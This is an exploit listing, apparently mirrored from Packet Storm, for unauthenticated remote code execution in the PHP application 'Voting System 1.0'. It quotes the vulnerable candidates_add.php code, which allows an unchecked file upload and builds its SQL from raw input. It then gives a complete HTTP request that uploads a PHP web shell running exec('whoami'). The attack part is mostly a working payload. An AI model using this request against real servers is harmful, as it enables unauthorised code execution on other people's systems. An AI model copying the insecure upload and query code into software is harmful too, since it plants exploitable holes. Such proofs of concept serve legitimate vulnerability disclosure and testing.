Exploit for Voting System 1.0 Shell Upload

Name: Exploit for Voting System 1.0 Shell Upload
Rating: 5 (319 reviews)
2021-05-07 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:162497
# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated)  
# Date: 07/05/2021  
# Exploit Author: secure77  
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code  
# Version: 1.0  
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB  
  
Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE.  
Your upload will be stored at /images/ and is also accessible without authentication.  
  
  
  
########################### Vulnerable code ############################  
<?php  
include 'includes/session.php';  
  
if(isset($_POST['add'])){  
$firstname = $_POST['firstname'];  
$lastname = $_POST['lastname'];  
$position = $_POST['position'];  
$platform = $_POST['platform'];  
$filename = $_FILES['photo']['name'];  
if(!empty($filename)){  
move_uploaded_file($_FILES['photo']['tmp_name'], '../images/'.$filename);   
}  
  
$sql = "INSERT INTO candidates (position_id, firstname, lastname, photo, platform) VALUES ('$position', '$firstname', '$lastname', '$filename', '$platform')";  
if($conn->query($sql)){  
$_SESSION['success'] = 'Candidate added successfully';  
}  
else{  
$_SESSION['error'] = $conn->error;  
}  
  
}  
else{  
$_SESSION['error'] = 'Fill up add form first';  
}  
  
header('location: candidates.php');  
?>  
  
########################### Payload ############################  
POST /admin/candidates_add.php HTTP/1.1  
Host: 192.168.1.1  
Content-Length: 275  
Cache-Control: max-age=0  
Origin: http://192.168.1.1  
Upgrade-Insecure-Requests: 1  
DNT: 1  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.1.1/admin/candidates.php  
Accept-Encoding: gzip, deflate  
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
------WebKitFormBoundaryrmynB2CmGO6vwFpO  
Content-Disposition: form-data; name="photo"; filename="shell.php"  
Content-Type: application/octet-stream  
  
<?php echo exec("whoami"); ?>  
  
------WebKitFormBoundaryrmynB2CmGO6vwFpO  
Content-Disposition: form-data; name="add"